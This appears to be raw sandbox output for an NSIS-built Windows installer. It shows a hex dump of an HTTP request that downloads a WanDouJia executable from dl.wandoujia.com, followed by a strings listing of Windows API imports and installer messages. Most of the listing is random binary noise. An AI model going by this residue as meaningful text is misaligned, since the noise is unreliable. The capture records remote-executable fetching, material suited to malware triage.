0x00000090 (00144)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000a0 (00160)   0d0a0d0a 6368650d 0a0d0a              ....che....

0x00000000 (00000)   47455420 2f66696c 65732f69 6e73742f   GET /files/inst/
0x00000010 (00016)   57616e44 6f754a69 615f7275 6e6b345f   WanDouJia_runk4_
0x00000020 (00032)   6b622e65 78652048 5454502f 312e310d   kb.exe HTTP/1.1.
0x00000030 (00048)   0a557365 722d4167 656e743a 204e5349   .User-Agent: NSI
0x00000040 (00064)   535f496e 65746320 284d6f7a 696c6c61   S_Inetc (Mozilla
0x00000050 (00080)   290d0a48 6f73743a 20646c2e 77616e64   )..Host: dl.wand
0x00000060 (00096)   6f756a69 612e636f 6d0d0a43 6f6e6e65   oujia.com..Conne
0x00000070 (00112)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x00000080 (00128)   650d0a43 61636865 2d436f6e 74726f6c   e..Cache-Control
0x00000090 (00144)   3a206e6f 2d636163 68650d0a 0d0a6865   : no-cache....he
0x000000a0 (00160)   0d0a0d0a 6368650d 0a0d0a              ....che....


Strings
 " "
E
&
.
.a
~...
.
.B.
,/KPip
msctls_progress32
MS Shell Dlg
/ P6pL
Please wait while Setup is loading...
/-P?pR
SysListView32
'["!	{
*?|<>/":
01?.I`n*
#}0>2$
0>5bY 
06Rtwx<
0-)B,`
0c*0Oxz
0EXF0h
0i6's?
0_IPgC6
:-0KRY
<0OVne
0t:]gz
^}0tO9
:0\UJP
0VQhGa#v
111	333
111	666
}*!.1:;@@AAAA;0,
1j$@95
1"M! /
(.1N]Z#
1!	v<rv
222	111
222	555
<}:24|
?(29OOL(7
~2DX	L
2Erjpl
(2QD&[
_!?2R/MMO
2?stCj%
2YmN&N1
333"222$333&666&777(888(777*888,888-888.777/7770888288828883777488848885888588868886888688868886888688857775888477747774777277717770777/777.777-777+888*777(777&777%777"777!777
333	444
~"41~s
42~@~n
'43P&_
444	---
444	...
444	222
444	555
-46{|	
-_\)4-cG
 4E>	X
4	>i}\85<&\gum&
4U<CwWL
;4xi%o>
:4+Z8L
!\']|&5
525e3ib1
544#4440777277757772666)666
544'PQR@
555	333
555	444
555	555
555	666	666
555!777#777'777*888,888.888/777/888/888.777,777)777'777#777
555}777}898~;;;
5A{{3tt
5<;D;Tz	
]5eZ"S}^
5f	/mif
5g0sCa+L~
5oRfY>
5pkn	~=
5:,]R.
5TNHnj
666	---
666	,,,
666	+++
666	333
666 777$888)777/7774888:888?888D888J888N888T888Y888^888b888g777m233u@:3
6a/DO~
[6D>|2
6 kJPL
6Q T" 4
777	***
7771777E888[888o888
+++	7773888oWUP
777(431M10.X666G888K888O888Q888Q777O888J888D777<7772777(666
7774777JG>3
7774888P888m888
7775444
7775888\888
7775888f888
777 666!777
777&7770888<888J888Y888g999v999
777$7772777@888M888Z777hG?5
777(7773888A888P999`888r888
777 777"666$777(222.-..7***?,,,@100<4448666788888889888<888<888>888@888A888B888C888D999D888E888F999F999F888F888F888F888F999F888F888E888D888D888B888A888@888>888=888;88888888888677738882777/777-777+777)777&777$777"666
777&777.666851-t/-)z111W777R888U888Y888[888]888]888]777[888Y888U888P888K888D777=7775777-777%666
777$777*77708886888=888C888I888O888U888\888b888h888m888r888x888|888
777$777+7772777:888B888J888S888\888d888m888u888|888
777$777,7774888=888F888P888Y888d888n888x888
777"777+7774888=888H888T888^888i888t888
777$777'777,77708886777:888>888C888G888K888O888S666Z../fH>2
777"777(777.7776888=888D888K888S888Z888b888h888p999v999|888
777 777#777&777)777,777/77726666111B'((Z-*'
777 777 777"777#777$777%888&888&888&888(888(888(888(888(888(888(888(777(777(888'888&888&777$777#777"777"777!777
777 777$777(777,888/77738887888:888>888B666H../X/,(
777$777/888<888L888\999n999
777(777?888V888k>:6
777'8882888<888G888T888`888l999y888
777&8882888@888P888`999r999
777(8883655@IJKY
777(8883888@888N888]888n888
777 888*8887888E888U999h777x>>>
777"888-8888888D888Q888^888l888y999
777 888B<<<oovv
777'888G888m888
777)888M888z999
777"888S888
777z888i888V888F8888777+888 777
77y~;a?k
7<Ah8l
 7JQ?m
*$"7K*
7\O }j
7s	LH[
7w?R*UFuugC
7~yCUV
888$777/888=888L666\CCDsp{
888{888J666
888|888r888f888[888P888D888:8880777(777
888~888t888k888a888X888M888C888:7771777)777!777
888{888v888q888k888f888`888Y888S888M888G888A888:8884777-777(777"777
888~999{999w999s888n888j888e888a888\888W888R888M888H888C888>88887773777-777(777$666
888_@BA
888h888C777#555
888j888L7770777
888m888X777B777.666
888N777
888PSVV
888t888f888Z888L888@8884777(777 666
888t888H777%555
888t999h888\888O888D8888777-888$777
888Y7771666
888y888h888X888I888<888.777#777
<<<~:::|888z777x777u888s888p888n888j888h999d888a888]888Z888V888R888N888J888F888A888<88887774777/777+777'777"777
888z888p888e888Y888L777>7770777#666
888z888r888j888a888X888P888G888>7776777/777(777!666
888z888t888n888g888_888X888P888H888A888:7772777,777&777
>:88988x
8DrN(	2D
$/8	%ih
"8L_8-
8NCRCu
8<)uMii
.95[aPi
98G[hswy
999|888i888T777=777'555
999}888l888[888K888=888/777$777
999~888m888[888J888<888.777"777
999m7771)))	
999q888b888T888F8888777,777"777
9imkL)
9-ov7_z
~9+Q8Z
)9SJZ^LE
9tupd";>>
,`9wXL
*A["0,9
A3"cFK
a4B"xN
A6 U(j
+a8SiE
%ab|oY3
.ACHpO
a;CI(F
AdjustTokenPrivileges
ADVAPI32
ADVAPI32.dll
Ahnne/
;aN88n
AppendMenuA
a%p<Z&
a ;WXN
Az<'c}
{:::;b
%b 1C,
B_2	%f
.<Bacjp
b-B^$9
BeginPaint
bhCaohj
=bNDE?bdbPXb
Bnt	@6
(bP>6l
${bP]>E
bP(R]M
Buu">#
ByC}e6
c__`|>>?
C1.[0N
c?1:<acjr
%C8ba#
CallWindowProcA
CharNextA
CharPrevA
CheckDlgButton
#(C`,K
ckLl-T,qN
clO)=\K$
CloseClipboard
CloseHandle
CMNWtE
CoCreateInstance
_C{oe8
C.o*HN
COMCTL32.dll
CompareFileTime
Control Panel\Desktop\ResourceLocale
CopyFileA
CoTaskMemFree
CreateBrushIndirect
CreateDialogParamA
CreateDirectoryA
CreateFileA
CreateFontIndirectA
CreatePopupMenu
CreateProcessA
CreateThread
CreateWindowExA
C@R.Z:
csmEef
CS@}U4
C/<?|t
cuv[mY
... %d%%
D$0+D$(P
d)2zp(n
]<-D!3z
%D>5vqkc
d6<6^wV%
D9p L`M_
d?@A7v
@.data
db^$,#
)D\^B!qP
DDC+###
)/)DDd
\dddxCCE
D$(+D$ SSP
.DEFAULT\Control Panel\International
DefWindowProcA
DeleteFileA
DeleteObject
@D|eS.nI
DestroyWindow
[DET n?=q
dFJSddnnv{z
D@}GxL
DialogBoxParamA
dIRTdlnv
DispatchMessageA
dK_`bo
-dplY^
DrawTextA
dR!BWAY
dSh{JBAE
D$(SPS
dTdfny
DuhNkor
d\X%S\
|e)3"_
E3|hcy
#e	: 3M
e5uWn 
;:EcOJ
ef J&,
eH^`M0R
EK36]RL
EmptyClipboard
EnableMenuItem
EnableWindow
EndDialog
EndPaint
Error launching installer
Error writing temporary file. Make sure your temp folder is valid.
Evi \J
ExitProcess
ExitWindowsEx
ExpandEnvironmentStringsA
F4e{Zl
f4#IU`
]f4m'S
fa<1<Bcfjr
fau|@D%
F''axt
fB:<Bfm
fc<<@Baffp
fCmW4s
fdB@Bacfmp
)FE$4Ev
/f+f8?
fh'cwsv
f	hSMBT
FillRect
FindClose
FindFirstFileA
FindNextFileA
FindWindowExA
{fksx75@,"
\^fl>LgneID
f|M4& 
'f~}nr
[FP&62
f P#Ps
FreeLibrary
, /fu`
,F*+/w
G?:;==[
G3d>'R
G3W;CuT
g6{O'R%^
g`|b\%w:A
gcqH%b0=9	s
GDI32.dll
GetClassInfoA
GetClientRect
GetCommandLineA
GetCurrentProcess
GetDeviceCaps
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDlgItem
GetDlgItemTextA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFullPathNameA
GetLastError
GetMessagePos
GetModuleFileNameA
GetModuleHandleA
GetPrivateProfileStringA
GetProcAddress
GetShortPathNameA
GetSysColor
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetTempFileNameA
GetTempPathA
GetTickCount
GetUserDefaultUILanguage
GetVersion
GetWindowLongA
GetWindowRect
GetWindowsDirectoryA
g}E<]Yl
GfE(2"[
gfgggVw
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
<&G`M?t
[!GqfN
&GS+q>
gwuwwwwvv
@~<gz~
g-@Z[;<ijr
^^_h444E8889777,777 777
h5ZlKfuC
H:|?6K>
hAHckCU
	(	HB=B0
hcn@28
)H:[e)
Heo?92
hG	X8TH
Hil=.Q
=Hk]JH,
h.]>n$
$[HOZ:
h[;ScC
ht89>~}:
.h	T-B
http://nsis.sf.net/NSIS_Error
HU*68U[
h~wwgew
hwwvwCG
i07+U7
i9"~~J
iA'Oki
IdCO N
iESF	y(
i%e/X*
!(if`I
{^iJ&0
{]`ilq{{
ImageList_AddMasked
ImageList_Create
ImageList_Destroy
i='MSZZMJ
incomplete download and damaged media. Contact the
Installer integrity check has failed. Common causes include
installer's author to obtain a new copy.
Instu_
InvalidateRect
IP%t3=
iRichu
IsWindow
IsWindowEnabled
IsWindowVisible
!/<=i|sZHA
^]iV=2M
.iZ* "
iZVG!u
j%@5|y.
:'jBVq|"M
j!%c`	
J`cd&[
J"HGcR
&*JI%"a
JIIv333
jIPG,:
JJSTdmrtux
j#	.K}~
@jKT%}
,JM$/:
>`J}~N
]J>T\7
J,Uf<1
J:"w=O
J^]]WUTL)!
jxcP+d
jy[,?=
+@[k97
`kdBPJ
kE+lhu
kEmLp0e&
KERNEL32
KERNEL32.dll
K_.esQ@E
-*kInS
kkkA555
kl<UoA
{`_klvx}}
kP99?NN?66>Ql
KSY+6T
,K/u4^
{k_Vmm
k} wN 
Kyl--1
kZTGG|%
:::L777
:lBvd5
LDFmoo
lE43:1"
lF@non
@*lH(#E
LKKw:::c888R777>777(555
L!(LHNu
_llkrUUU
`LlKt+
l`llp{{
l_`llp{{
lllq{|
}lllS444.777#777
l`lpx{
L MJ^z
LoadBitmapA
LoadCursorA
LoadImageA
LoadLibraryA
LoadLibraryExA
LookupPrivilegeValueA
{`_`lpx{
lQ	uXJy
L|r	F-4
lRgW>{
L<~R(T
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpynA
lstrlenA
LtGEfd
LttsYWOL7'
 *(Lu9
{_`lvvz}
LVWMUUS
{]``lx{}}}
L&][\XH
L}xtiYWVN92/#
]}}|M8
mc<4.#./>b
mcB<-+6Qi
mE? :g
MessageBoxIndirectA
MFHHGD
MHKRHF
\Microsoft\Internet Explorer\Quick Launch
mjcaacffmmr
MKRSRHF
{MKZSSRHE
m]mcU;
More information at:
MoveFileA
MoveFileExA
`m@P#3?$
MR[[[SRHE
M_``_\[SKF
MulDiv
MultiByteToWideChar
m:v#	X]
m>xp+u
?|M^Z;Db
{,:>	n
n?1<<=a
)~N2??
N39m;dM
'nAo8"
Nc65qMf
.ndata
nDEW\:
?nd<*KtB
!!"n&&&d---W222P555M777L888M888N888P888R888S888T888U888V888W888X999Y888Y888Z888Z888Z999Z888Y999Y888X888X888W888V888T888S888R888O888N888L888J888H888F888C888B888>888<888:777677737771777.777,777(777&777"777 777
nez?e#O
@N}I+C
-Nldp`
:Nl*W*J
:nnm)GFs
)NoSYU
NOTavr
nPy7:V
NSIS Error
~nsu.tmp
}ntox93
nUbX8Zy
NullsoftInst
NulluM	E
}nVAI?"
nZ?3/'I
n<)Z___[UI
_[[#o $
o,0 8qiW
o}}}@222
o3%SV5n
OAW['|
?oc~Ms
]^__oE~
O'kcQ+
+o<kyZ;
ole32.dll
OleInitialize
OleUninitialize
Om=iG'
oMri	>Z
OOO}555`888P888@7772888&777
>/"ooV
OpenClipboard
OpenProcessToken
/OQ%F$
,or&0F
]~,Os.
^=oS'3
OsA_^FF
oSCCid&
o<#WQFR
O+	'	z
;~p3	o
~p<4X+e
PAh>_>
p@AY[*
PeekMessageA
*@"@pE@I
pfa<1-Ab
pfa<@bq
pfcB<1-$/>X
pfcB:/+->Q
P%`fzV.
pjca><1-->Qi
pmffccBB@BdggvMDFFD
p#N&~:
PostQuitMessage
-:P^po
PPPPPP
P?T!1SZu
p}T3E;og%
ptcj.	?
p(t`c;q
}Pv}+)
p&^w1)
P^Wa&y
!px='k
pXp0AR
p=YdEi
[\Pz1e
%{{q7'(
qE:n9rTK
_'q>}H
Q$I0a<d
Q>L?@*
qmv0DmQ
q/>N1`
qqCF`%
qrLTKg
Q"sU<X
Q) vf^
@Q}Wi~
QWIyxH
&&`r>*
r53[$X*
ra<1<Bcmr
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyExA
RegDeleteValueA
RegEnumKeyA
RegEnumValueA
RegisterClassA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
RemoveDirectoryA
[Rename]
rgGpQ	
RichEd20
RichEd32
RichEdit
RichEdit20A
R@ilCK
r	:[Iz
rmffcffjmnr
rmjcaB>414>Vi
rmjfjjmpr
rmmfcaB@<<Bdi
rmmffccB@2
rrmmpor
Rt%O.Z
rwRPt7 M
'(RY}0
s1viSC
ScreenToClient
SearchPathA
SelectObject
SendMessageA
SendMessageTimeoutA
SeShutdownPrivilege
SetBkColor
SetBkMode
SetClassLongA
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetDlgItemTextA
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFileTime
SetForegroundWindow
SetTextColor
SetTimer
SetWindowLongA
SetWindowPos
SetWindowTextA
[SfAyO
sFGGGD
SgHcdIO
sGHKKGD
sGKRRKFC
SHAutoComplete
SHBrowseForFolderA
SHELL32.dll
ShellExecuteA
SHFileOperationA
SHFOLDER
SHGetFileInfoA
SHGetFolderPathA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHLWAPI
ShowWindow
sJSSSRHE
~\[SKE
`\[SKG
softuV
Software\Microsoft\Windows\CurrentVersion
/:*}=}Sp
SP1bwf
SP c>z
SQSSSPW
S}?S}+%
s)s/u9g
sv8mbK
}}sYeW
SystemParametersInfoA
> _?=t
:_T7I `
TB81=S|
tbavz$
#]:tc>
>Tc 0O
TfA= P
TFR_dfqsx
&t>Gs'
!This program cannot be run in DOS mode.
)t&HVW
}tigsO5
}tigvN5
}tisgN5
}tisiO5
}tiWg3g
TJSddnv
	*TLBH
T+lEa{J
}TLOYxw}}}w}tL7
tM[\\\ZSKF
Tn0d4XYYK
tNf76d?
too/AO8
_^[t	P
*TPJhi
)t .R!
TrackPopupMenu
|Trb[;
}tsee2
~}tsgg
~}tsgW
TSTdnny
TTSu777=777
ttwxxx
~}ttYe99
tvtwxx
tVXZ3t"!
twwwxx
twwxxx
~}tYWL(
~~}tYWV
U0Dg`'5
u49-,?B
U8.n):N
;#U{e	\K
unpacking data: %d%%
@uN"u^
<UO4'h 
USER32.dll
~~usWT
~}usWW
utsgW(e
utYTL7(
}utYWV
%u.%u%s%s
~uusWV!g
uu]WL)
~uu]WT
~uu^WT%V
~uuYWV
}uuzyy
~u^WT(9
~~u^YT77
U_~~`_[ZRHD
v7{czK
v95LpA
V9(Oo{
'&Vb{Z
>v)^*e
verifying installer: %d%%
VerQueryValueA
VERSION.dll
#Vh;+@
vh3_$%1ym[
vhw{aG
Vh-%XK
vKU[ZZSKF
v_kvvzz
vLG=~(% X||| 
 vN~cj
vo"5[Z
vO'Qat
vQ|QcQr\
v@S:,B
VtttnSST
V+_?ub
vVggwwxx
Vv LL;
vwwwxx
vwwxxz
v^XXQ!C
vxZt6p
V/Y6jP%
vztpR3
WaitForSingleObject
Wft]Hs
Wk#APs
WKZZZSKGC
	wL>^Q
)wOJfH
WriteFile
WritePrivateProfileStringA
<-:W_rqt
WR[\\[SRGC
wsprintfA
}wtiiw2W
w@ 	u4
w~vVvx
wvwwxx
wvwwxxx
wvwxyx
www7wx
wwww7w
wwwwgw
wwww'h
wwwwvwx
wwwwwx
wwwwxxx
}wwxx}
wwxxxx
wxwxxgee
W^y%888
 x9027)
	XCp9o
^!/>Xd6
XE*+gJ
XfapP"
X._|g*
X/{H?v
xhxxxxx
X*J<D/e
x_`ll{{{
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
X)m$ns
x_rr\]ii^V
xtwwxxx
x~ugGx
xUND~.x
xU^__\[SRHD
xvwwxxx
xwegxx
xwnigdPV?
xwtnvs!{
xwwGGgw
xwwwvggeg
xwwwwG
xx}}}}
xxwwwp
xxxfGw
xxxxvG
xxxxxx
xxxxxxx
xxxxxxxx
xxxxxxxxxx
XYiQ7v
:"Y4AS
Y5|f"S
Y5p9|8
}:$y8p1~
&")(yC
+ Y;>d
y<I//z
yJL_`bop
yJ^^^u^^YM)
))(y///m333h666e777d888d999f999h999i888j888k888l777m777n777n888n777n777n777n888n888m666m777l777l888k888i888h999f888d888c999`888^888\888Z888V888T888Q888N888J888G888D777A888=888988867772777.777+777(777$777 666
ypy|~lZ?Tcq
ysg#Sh
\y'^|U&
~}^YWO
YyoI)m
Z8}(Qmy
?~ZdvI
Z}NmH@D
~\ZRHD
	zTplGX
Zx{^-j
zXJu@]
[Z$z{=
\zzzijjiv?>>n